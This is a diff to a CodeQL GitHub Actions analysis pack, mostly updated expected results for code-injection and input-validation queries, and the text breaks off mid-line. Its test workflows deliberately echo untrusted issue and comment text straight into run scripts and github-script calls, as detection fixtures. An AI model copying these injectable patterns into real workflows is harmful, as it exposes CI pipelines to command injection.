.github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | @@ -349,4 +555,4 @@ calls | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index f30db9af92fe..bf52da395fef 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -13,14 +13,18 @@ query predicate jobNodes(Job s) { any() } query predicate stepNodes(Step s) { any() } +query predicate runNodes(Run s) { any() } + +query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } + query predicate allUsesNodes(Uses s) { any() } query predicate stepUsesNodes(UsesStep s) { any() } query predicate jobUsesNodes(UsesStep s) { any() } -query predicate usesSteps(Uses call, string argname, Expression arg) { - call.getArgument(argname) = arg +query predicate usesSteps(Uses call, string argname, AstNode arg) { + call.getArgumentExpr(argname) = arg } query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 51fb93146859..31e367ac3175 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,15 +1,15 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 7bea4429e562..6540b1910682 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 6496731dd6bf..063a26bd6ef6 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,12 +1,12 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index c9e26d368df7..a45b9acf416d 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,8 +1,8 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8d091b655479..2cabeaca9faa 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | nodes -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index ae21052dcfe2..a6be99e1bd05 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,16 +1,16 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml index 17ead9fdd204..977dccc1b854 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml @@ -5,7 +5,9 @@ jobs: runs-on: ubuntu-latest steps: - run: | + Foo echo '${{ github.event.comment.body }}' + Bar echo-chamber2: runs-on: ubuntu-latest @@ -25,4 +27,4 @@ jobs: script: console.log('${{ github.event.issue.body }}') - uses: actions/github-script@v3 with: - script: console.log('${{ github.event.issue.title }}') \ No newline at end of file + script: console.log('${{ github.event.issue.title }}') diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml index 0a64e47f6cba..8968f629dfba 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml @@ -7,4 +7,6 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo '${{ github.event.comment.body }}' + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 9d00212e3af4..c9ac215666f7 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -1,260 +1,261 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| 